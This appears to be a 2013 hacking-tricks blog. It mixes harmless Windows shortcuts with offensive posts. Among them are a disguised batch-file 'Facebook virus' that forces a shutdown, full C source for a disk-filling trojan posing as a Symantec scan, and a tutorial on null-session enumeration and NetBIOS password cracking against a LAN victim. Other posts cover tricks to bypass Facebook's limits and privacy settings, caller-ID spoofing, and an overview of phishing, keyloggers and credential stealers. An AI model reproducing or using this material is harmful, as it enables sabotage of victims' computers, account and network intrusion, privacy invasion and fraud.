Friday 16 August 2013

windows 7 secret

Windows 7 Cheatsheet::::::::::::::::::::::::::::::::: :: As you all know Windows 7 RC3 is launched. Here’s a little cheat sheet I made up for some of the handy new hot key combination, many of which I’ve become quite dependent on! From Desktop Windows Key + Tab : Aero [press Tab to cycle between Windows] Windows Key + E : Windows Explorer is launched. Windows Key + R : Run Command is launched. Windows Key + F : Search (which is there in previous Windows versions too) Windows Key + X : Mobility Center Windows Key + L : Lock Computer (It is there from the earlier versions as well) Windows Key + U : Launches Ease of Access Windows Key + P : Projector Windows Key + T : Cycle Super Taskbar Items Windows Key + S : OneNote Screen Clipping Tool [requires OneNote] Windows Key + M : Minimize All Windows Windows Key + D : Show/Hide Desktop Windows Key + Up : Maximize Current Window Windows Key + Down : Restore Down / Minimize Current Windows Windows Key + Left : Tile Current Window to the Left Windows Key + Right : Tile Current Windows to the Right [Continue pressing the Left and Right keys to rotate the window as well] Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc. Windows Key + = : Launches the Magnifier Windows Key + Plus : Zoom in Windows Key + Minus : Zooms out Windows Key + Space : Peek at the desktop From Windows Explorer 22. Alt + Up : Go up one level 23. Alt + Left/ Right : Back/ Forward 24. Alt + P : Show/hide Preview Panel Taskbar modifiers 25. Shift + Click on icon : Open a new instance 26. Middle click on icon : Open a new instance 27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges 28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu. 29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc. 30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh

Facebook virus

faceboof virus Making a fake facebook virus : ==================== 1) Open notepad 2) Type this in : @echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........." 3) Save it as something.bat 4) Right click on shorcut and click Properties. 5) Click Change Icon 6) Choose Internet Explorer icon or similar , click OK , then click Apply. 7) Now your facebook virus is almost ready. 8) When victim click on it , he will get warning messages and after some time his computer automatically shutsdown .... :)) NOTE : ===== Its just a simple prank and it won't actually hack the victim

trojen from c language

Trojen from c language /* SPACE EATER TROJAN BY ASH- HACKER. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD! */ #include #include #include #include FILE *a,*t,*b; int r,status,vir_count; double i; char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice; void eatspace(void); void findroot(void); void showstatus(void); void draw(void); void accept(void); void main() { draw(); accept(); textcolor(WHITE); draw(); gotoxy(12,8); cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT..."); sleep(3); gotoxy(12,8); delline(); cputs("PRESS ANY KEY TO START THE SYSTEM SCAN..."); getch(); gotoxy(12,8); delline(); findroot(); } void accept() { textcolor(LIGHTRED); gotoxy(1,8); cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n \rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\". \n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT."); if((choice=getch())!=13) exit(0); } void draw() { clrscr(); textcolor(WHITE); gotoxy(12,2); cputs ("***************************** ***************************"); gotoxy(12,6); cputs ("***************************** ***************************"); gotoxy(12,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(67,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(14,4); cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)"); } void findroot() { t=fopen("C:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); textcolor(WHITE); a=fopen("C:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("C:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("D:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("D:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("D:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("E:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("E:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("E:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("F:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("F:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("F:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } if(t==NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM."); getch(); exit(1); } exit(1); } void eatspace() { textcolor(LIGHTRED); gotoxy(12,16); cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n"); textcolor(WHITE); gotoxy(12,18); while(1) { for(r=1;r<4;r++) { for(i=1;i<900000;i++) { status=fputs(ch,b); if(status==EOF) { textcolor(WHITE); vir_count=random(120); draw(); gotoxy(12,8); cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count); gotoxy(12,10); cprintf("PRESS ANY KEY TO CLOSE..."); getch(); break; } } cputs("."); if(status==EOF) break; } if(status==EOF) break; } exit(0); } void showstatus() { gotoxy(12,8); cputs("SCANNING THE SYSTEM FOR THREATS"); gotoxy(12,10); cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS"); gotoxy(12,13); cputs("SCAN IN PROGRESS. PLEASE WAIT..."); }

top 15 xp secret

1. Useful key shortcuts available: Windows key + D - shows the desktop. Windows key + M - minimizes all open windows. Windows key + Shift + M - maximizes all open windows. Windows key + E - Runs Windows Explorer. Windows key + R - shows the RUN dialog. Windows key + F - shows Search window. Windows key + Break - shows System Properties box. Windows key + TAB - Go through taskbar applications. Windows key + PAUSE Display the System Properties dialog box. Windows key + U Open Utility Manager. ALT + TAB - Cycle through opened applications. Hold down CTRL while dragging an item to Copy it. CTRL + ESC Display the Start menu. ALT + ENTER View the properties for the selected item. F4 key Display the Address bar list in My Computer or NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder. 2. Lock Windows to protect computer : You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature. 3. Edit sysoc.inf to list all software : To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows \inf\. Just remove the word hide next to the software pack. Note - use this at your own risk. Removing critical components of the system will make Windows instable. 4. Windows XP comes with IPv4 and IPv6 : Windows XP comes both IPv4 and IPv6 support. To enable IPv6, you can install the protocols needed with the command "ipv6 install" in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work. 5. Access Task Manager with shortcut : To access the Task Manager easier, you can make a shortcut that points to %windir% \system32\taskmgr.exe. 6. Stop treating ZIP files like Folders : If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll. 7. Run program as diffrent user : You can run a program as a different user. Right click an application and select Run As command. 8. Switch users leaving applications opened : You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability). Go to Task Manager - processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname \username explorer.exe. A password prompt will appear to login to the desired username. The user's session will start, with all your previously applications running. I recommend to open first a command-line prompt and type runas /? to see all the options available. 9. Rename multiple files in Windows at once : Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them. 10.Task kill feature in Windows : Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill to end the specific task. This forces an instant closing of the task. 11. Edit features with GPEDIT.MSC : You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features. 12. Edit accounts in the command prompt : You can edit accounts by running "control userpasswords2" at the command prompt. 13. Use systeminfo.exe to see System Information : You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes. 14. Disable system services for maximum performance : There are system services that you can disable to free up the system's load. To access the interface that permits you to make changes to system's services, type services.msc and the command prompt. This is a list of services that are *usually* useless and can be safely disabled. Alerter Application Layer Gateway Service, Application Management Automatic Updates Background Intelligent Transfer Clipbook Distributed Link Tracking Client Distributed Transaction Coordinater Error Reporting Service Fast User Switching Compatibility IMAPI CD-Burning Indexing Service IPSEC Services Messenger Net Logon Net Meeting Remote Desktop Sharing Network DDE Network DDE DSDM Portable Media Serial Number Remote Desktop Help Session Manager Remote Registry Secondary Logon Smartcard SSDP Discovery Service Uninterruptible Power Supply Universal Plug and Play Device Host Upload Manager Webclient Wireless Zero Configuration WMI Performance Adaptor NOTE: Make sure you don't need them since some applications you're using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again. 15. Repair Windows XP by using the XP installation CD: If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run "attrib -H -R -S" on the C:\Boot.ini file and delete it. Run "Bootcfg / Rebuild" and then Fixboot.

Thursday 15 August 2013

simple command for lan hacking

Simple Commands for LAN Hacking for beginner I am sure many guys know all these commands.I am just gonna start on LAN Hacking so I am starting from basics.These commands are for beginners.These commands will run on CMD prompt. First of all, open your Network Connection. Now right click and select Properties. Then Select TCP/IP and click on Properties again. Click on Advanced and WINS tab. Here select Default for NeBIOS. Now come back to the main window named Local Area Connection. Now select File and Print Sharing for Microsoft Networks and hit enter. NOTE : This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD. First thing you need to know is some very helpfull commands to use on CMD(Command Prompt). In case you don’t know how to get CMD open in your box, then click on Start, then Run, then type “cmd”. nslookup net view net use net user ping tracert arp route nbtstat netstat ipconfig In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does. This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command. CODE : ping x.x.x.x (x is the IP address). ping www.whatever.com (www.whatever.com is the website you want to ping, but you don’t know the IP) NOTE : Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down. This command is mostly for resolving DNS into IP. Lets say you know the website URL but you don’t know its IP(and you want to find out). nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP) Now, another really nice function of nslookup is to find out IP of specific Mail Severs. CODE : nslookup (enter) set type=mx (enter) yahoo.com This command will give you the mail server IP of yahoo.com . You can use whatever server you want and if it is listed on DNS, then you get the IP. Now why would you want to have an IP of a mail server? To send spoofed mail to your friends or even for SE. In case you looking for “How to spoof email”, then look for my “How to spoof email tutorial” http:// www.infowar.com/ forums/ showthread.p … p;threadid=2360 This command will give you the hops that a packet will travel to reach its final destination. OBS: This command is good to know the route a packet takes before it goes to the target box. CODE : tracert x.x.x.x (x is the IP address) tracert www.whatever.com (www.whatever.com is the website you don’t know the IP) This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN. CODE : arp -a Route This command will show you the routing table, gateway, interface and metric. CODE : route print This command will show tons of very helpful things.Your IP, gateway, dns in use. CODE : ipconfig ipconfig /all This command will give all that info but for all networks you might have it.Also, in case you have a dynamic IP and want to change it, then type. ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP) NOTE : Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don’t do anything stupid. This command will show you connection to your box. CODE : netstat netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above) This command will show you the netbios name of the target box. CODE : nbtstat -A x.x.x.x (x is the IP address) nbtstat -a computername net view x.x.x.x or computername (will list the available sharing folders on the target box) net use \ipaddressipc$ “” / user:administrator (this command will allow you to connect to the target box as administrator) Now if you want to connect to the target box and browse the entire C drive, then use this command: net use K: \computernameC $ (this will create a virtual drive on your “my computer” folder) NOTE : Keep in mind that this will only works if the target box doesn’t have an administrator password set. And least but not last, the “help” command. whatevercommand / help whatevercommand / ? This command will help you to understand what it does and all the switchs available for each command. Very useful if you know the command, but forgot the right switch.

change your ip address

Change your IP in less than 30 seconds The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked : Click on "Start" in the bottom left hand corner of screen. Click on "Run" Type in "command" and hit ok. You should now be at an MSDOS prompt screen. Type "ipconfig / release" just like that, and hit "enter" Type "exit" and leave the prompt Right-click on "Network Places" or "My Network Places" on your desktop. Click on "properties" NOTE : You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks. Right click on "Local Area Connection" and click "properties" Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab Click on "Use the following IP address" under the "General" tab Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up). Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers. Hit the "Ok" button here Hit the "Ok" button again NOTE : You should now be back to the "Local Area Connection" screen. Right-click back on "Local Area Connection" and go to properties again. Go back to the "TCP/IP" settings This time, select "Obtain an IP address automatically" Hit "Ok" Hit "Ok" again You now have a new IP address NOTE : This only changes your dynamic IP address, not your ISP/ IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

hack blocked friend request

So Facebook has a new trick up their sleeve which is annoying the heck out of many many people. In fact, I myself tried to send a request to someone who lives less that 15 minutes away and it wouldn't let me. So if you've gotten the Facebook "Do you know this person?", "Friend Request Can't Be Sent" message while trying to send a Facebook friend request, here's the GeekDrop trick on how to outslick Facebook and send that request anyway. It's actually very simple. Here's what you'll be needing: * Firefox (FF) * The FF extension named "Tamper Data". (Install it, and then restart FF). Once the Tamper Data extension is installed, you'll find it's menu item under the "Tools" menu in FF. Click it when mentioned below to open it's window. So let's start, simply follow the steps in the screenshots below ... Facebook friend request hack blocked Here's the screen you'll see when Facebook blocks you from trying to add a friend. The title of the dialog box says "This Request Can't Be sent", and "Do you know this user personally?". We want to go around this ... Facebook trick to bypass a blocked friend request Facebook has gotten a little smart and when you click the "Add as friend" button on the target's profile, you may see the top screen again. * You'll need to get to the "Send request" screen as shown above. The trick here is to just keep clicking the "Add Friend" button, and closing the "Do you know this user personally" dialog box over and over until the "Send Request" screen shown above finally pops up. It may be the second time, it may be the 50th time, but it'll eventually pop up. * When it does, go to the "Tools" menu in Firefox and click the "Tamper Data" menu item near or at the bottom of the list. * Then as shown in the screen below, click the "Start Tamper" menu item. * And then finally, click the "Send Request" button in the screenshot above. Facebook Tamper Data Edit Screen Facebook Friend Request screen Add Facebook tamper request screen click tamper Once you've clicked the Send Request button with Tamper Data started, the above screen will show, make sure that the URL shown looks like the above one, so you're "adjusting" the correct data. Then Click the "Tamper" button. Facebook Tamper Popup Submit You'll come to the above screen next. Follow the instructions as shown and click the OK button. If or when any other "Tamper with request" screens popup while you're in the middle of editing the above data, just click the "Abort request" button on it to get it out of your way. Facebook Javascript Content Length Tamper Friend Request Hack Trick Once you click the OK button on the edit screen you'll see the above popup dialog, just click the OK button. This needs to be done to keep all data proper before it's sent. Facebook Add as friend do you know this person blocked request successfully added Once you OK the Content Length dialog, you should see the above screen, as if you were never blocked from sending the facebook friend request. If you get the original "this request can't be sent" screen again, just do all of the steps over again. You may have to do it a few times until it works. Eventually it will. And that's all there is to it! We have many other awesome loopholes and tricks up our sleeves here on GeekDrop, and all of the best stuff is in our private Premie area, consider subscribing for access to the full GeekDrop works, it's very very cheap! And be sure to click the Facebook Like and Retweet buttons at the top of this post so all of your friends know where to get the good stuff! Smile

hack pc on lan

Hack your desired PC on LAN As I have told in my previous post Simple Commands for LAN Hacking for Beginners that these days I am working on LAN Hacking so guys here is my new post in this respect .Hope you guys love it .Dont forget to Change your IP Address if you want to remain safe but its not compulsary.Through this technique you will be able to hack your desired PC on LAN . This technique will be taking advantage of Port 139.Most of the time,Port 139 will be opened.But if unfortunately your victim's Port 139 is filtered or closed then you can't hack him by this method .So guys follow these steps carefully and at the end you will be able to hack Lan computers. NOTE : All the tools used in this tutorial have already been sent to all the Email subscribers to their emails,but if someone didn't got it then post your email in the comments and if we find that email in subscription list we will send you all the tools. Steps to Follow * First of all,I will do a port scanning at the target computer which is 192.168.40.128.This computer is inside my LAN network. * Scan it using Nmap, this is actually for checking either its port is opened or closed. * I get the result and it shows Port 139 is opened up for me. * Now we will need both of these tools: 1. USER2SID & SID2USER 2. NetBios Auditing Tool * I have already sent these tools to all the Email Subscribers. * After you get both of them,put them in the C: directory. * Now you need to create a null session to the target computer.For this open cmd prompt and write this below command as it is as shown in image below : * Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER. * We will first using USER2SID to get the ID.Just follow all the codes same as shown in below image ,just replace the IP Address of victim * We will test against the Guest account because Guest account is a built in account. * After we get the ID,we need to do some modification on the ID. * We take the ID we get from the guest account and modified it become "5 21 861567501 1383384898 839522115 500". * Please leave out the S-1-,leave out all the - too. * Now you will see that you get the username of the Administrator account. * In this case,the Administrator account is Administrator. MAIN PART * Now we are going to crack the Administrator account for the password in order to access to the target computer. * First of all,extract the NetBios Auditing Tool in C directory, which you have received in your email. * Now open cmd prompt and write the below code as it is : * Press on enter and the tool will run and finally you will crack the password. * In this case,I have get the password. * In order to proof that I can get access to the target computer using this password. * After you press enter,it will prompt you for the username and password. * Therefore,just input them inside the prompt and continue. * Target C drive will be on your screen.You are done .... Prevention * In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 13.

hello tune hack

hi Guys... im 1st tym posting mah Trick Which im using from Last 2 months... THIS TRICK HELPFUL FOR THOSE WHO MAINTAIN LOW BALANCE ON PHONE (LESS THAN 10/-) WITH THE HELP OF THIS TRICK U CAN USE HELLO TUNE FOR 10 DAYS @RS 5 ONLY... Now trick is here... . Keep balance app. To zero.. keep balance rs 1 or less than 2... Now call 578785 (toll free) and acticate ur Favorite Hello Tune... after activating.. Ur balance goes to minus 5 (-5).. Dats it... UR HELLO TUNE WILL BE ACTIVATE FOR 10 DAYS... (15 + 10 for just 5 rs.) NOW RECHARGE.. Airtel wont charge u anything later... .. . now when ur 10 days are going to over Reduce ur Balance to 1 or less Than 2.. Keep ur balance low untill Ur Hello Tune subrcription renew.. After 10 days airtel again do ur balance to -5 and renew ur hello tune for 10 days... Thats the 100% legal trick.. Working 100% in delhi... Im using it for last 2 months... Enjoy... And reply if its working in ur state or not.??

free airtel to airtel

Free Airtel to Airtel Free Airtel to Airtel Hi friends,this is an special offer for airtel customers to call free from airtel to airtel free of cost for 100 minutes any time in a day.this is an service provided by an website called beep.download a small application to your mobile phone and activate it and now you can use the free calls.to download click the link below http://wap.beepindia.com/ beep.php

free sms airtel

Free SMS AIRTEL NEW AIRTEL FREE SMS TRICKS 2011 You can now send 2 free sms daily. Here is how you do it: » Write : %F% (mobile no) (msg) and send it 59191 » Example: %F% +919995****** Hello and send it to 59191

turn off your lan computer by using main pc

Turn Off- Ur Lan Computer..By Using Main PC Guys here is a amazing trick which you can use in your school, college office or at any place where you are a part of any LAN to shutdown all computers. Just follow some steps and you are done with this cool trick. 1. First of all you need admin access to a computer connected on any LAN. 2. Now open commant prompt. (start/run/cmd) 3. Now type “shutdown – i” (without quotes). 4. A dilogue box will open. 5. You can add the computer/ computers you want to make target. 6. Now you have to choose the action(shutdown/restart/log out). 7. Set a time limit. 8. Click ok and other work will be done automatically. Enjoy … !!

find who unfriend you on Facebook

Find who Unfreinded you on Facebook Lots of people are curious to find who unfreind them or removed them on Facebook, If this is the case with you too then we have the solution for your curosity, Unfriend Finder for Facebook is a Google chorme extension which will let you know who Unfreinded you on Facebook , The Extension is very simple to use, Below I am posting a step by step guide to install and use Unfreind Finder 1.First of all Install Unfriend Finder for Facebook Google Chrome extension 2.Once it is installed you will get an “Unfriends” option just below “Friends” option. Installation Follow these Steps to Uninstall previous versions of Unfriend Finder. From the Tool menu, you need to reach the Extension pages (or navigate to chrome://extensions/) 1)Confirm installation 2)Despite the alert about data collection, confirm. Chrome shows this alert for every userscripts. Unfriend Finder is only collecting data about your friendlist, only on facebook.com. 3)Installation review 4) That's it. You are done with the installation. And now you will recieve the notification whenever you are unfriended.

send free sms from Facebook

You can send free sms from facebook by using an application its called the INDYAROCKS . I tested it and we can create the account by using facebook and few more things within 2 minutes. Start sending sms from the facebook application itself :) , you can send sms all over to india from the facebook itself :) you can send free sms to your friends * group sms * schedule your sms and more features :) * i heard that 160by2 and way2sms have limited sms sending facility, but indyarocks don’t have that limit we can send unlimited :) , By just login to your facebook account and open indyarocks application on facebook and start sending sms to your friends all over india Email This BlogThis! Share to Twitter Share to Facebook Share to Google Buzz

top 10 ways to hack Facebook

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking here at RHA, In my previous post which I wrote in 2010 related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2011, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2010. So here are the top 10 methods which have been the most popular in 2011: Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims " Email Address " and " Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials. I have explained the step by step phishing process in my post below: How To Hack Facebook Password 2. Keylogging Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware " to this topic. 3. Stealers Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above. 4. Session Hijacking Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking. Further Information Gmail Cookie Stealing And Session Hijacking Part Gmail Cookie Stealing And Session Hijacking Part 2 Gmail Cookie Stealing And Session Hijacking Part Facebook Session Hijacking Attack (Recommended) 5. Sidejacking With Firesheep Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users. To know more about sidejacking attack and firesheep, read the post mentioned below: Firesheep Makes Facebook Hacking Easy 6. Mobile Phone Hacking Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying softwares are: 1. Mobile Spy 2. Spy Phone Gold 7. DNS Spoofing If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account. 8. USB Hacking If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below: Usb password stealer To Hack Facebook Passwords 9. Man In the Middle Attacks If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below: Man In the Middle Attacks With SSL Strip If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it. 10. Botnets Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

how to increase internet speed

The following post is on will tell you some methods to increase your internet speed,I will show you some ways to increase your net and browser speed Go to Start>>Run and then type in “gpedit.msc” without the quotes (“) Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler. after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled ”, or you can put it to “Enabled” and change the value to 0. Now this will increase your internet speed by 20%

how to view private profile on Facebook

how to view private facebook profiles Learn how to view private facebook profiles In post i will tell you how to view private facebook profiles,This latest hack proves that anyone in the world is able to view anyone’s private tagged pictures,This is why facebook is not privite is still open even after such publicity all over the web.Major security threat. Have you ever wanted to see pictures of an enemy but you couldn’t because her or his facebook account was set to private. Well thats all going to change because I will show you very simple way to view private facebook profiles Method: 1. Login in your Facebook Account www.facebook.com 2. Search for the person 3. Find the persons ID # by Clicking on Send messages 5. Copy and Replace the ID # to the link http://www.facebook.com/ photo.php?pid=1234567&id= [Person’s ID]&op=1&view=all&subj= [Person’s ID] 6. Copy and paste the link in your browser 7. You should be able to see 10-20 pictures before facebook denies you access.

How to get into facebook at school - Method

1. Go to Unblock facebook now Now site. 2. Now, simply enter www.facebook.com in text field below “Website URL” and hit “Browse” to unblock Facebook site. 3.Thus, now your blocked Facebook is converted to unblocked Facebook and you can now get into facebook at school or office using this hack Thats it. Just check out this Facebook proxy site server useful to unblock Facebook site. Thus, you can now bypass Facebook restrictions imposed by sytem admins and unblock Facebook site. This proxy site can not only unblock Facebook , but also unblock myspace , orkut and many other blocked sites. If you have any problem in using this Facebook proxy site to unblock Facebook,

Wednesday 14 August 2013

transfer your Facebook friends to Google +

Transfer your all Facebook Friends To Google Plus eRecently Google launched his awaited brand new social networking site called Google+ . The Google plus v/s Facebook is the hot topic among the tech bloggers. Facebook already cross the one million users. Google want to capture the market share of social networking through google plus after orkut. Now the question is, If I am user of google plus, how can i connect with my friends which is available only in facebook? Can i transfer my facebook friends to Google plus? The answer is yes, you can transfer your all Facebook Friends To Google Plus.To export all your friends to facebook try Facebook Friend Exporter Chrome extension in google chrome.Follow below instruction to transfer your friends to google plus. Make sure you are logged into m.facebook.com , you must be logged in for it to work. Must have English version of Facebook for this to work (you can switch) Do not enable SSL for Facebook use HTTP not HTTPS If you need any help running this, contact me. Commenting below will be lost. An “Export” button will appear on Facebooks toolbar after refresh once installed. Please disable all Facebook Extensions that you have downloaded, many of them affect the page. For example “Better Facebook” breaks this extension. This extension will allow you to get your friends information that they shared to you: - Name - Emails - Phone numbers - Screen names - Websites - Address - Birthdays Two methods of exports CSV file (if you have many friends, greater than 500, it will be very slow) Gmail Contacts ( It will place them into a folder called “Imported from Facebook “) Notice: Your contacts will be cached, so don’t worry, you will continue where you left off. This extension states “ Browsing History” permission, this is needed to transfer data from Facebook Tab to the extension. Your history absolutely doesn’t get exported, it uses OAuth for authentication, so only the user logged in OAuth can get that data.

make prank call

Make prank calls call spoofing If you want to fool your friends or want to see the demo of call spoofing, i have a better call spoofing service. It has many services. You can do prank calls, spoof caller id, change your voice during call. When you call someone he will see the number which you want him to see. This service is easy to use. follow these steps: 1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call. 2. Press "Get me a code" and we will provide you with number to call and a code. 3. Call the number 4. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected. Warning: Do not use this for any crime. click to use this service here: http://www.crazycall.net/

restrict access folder using cmd

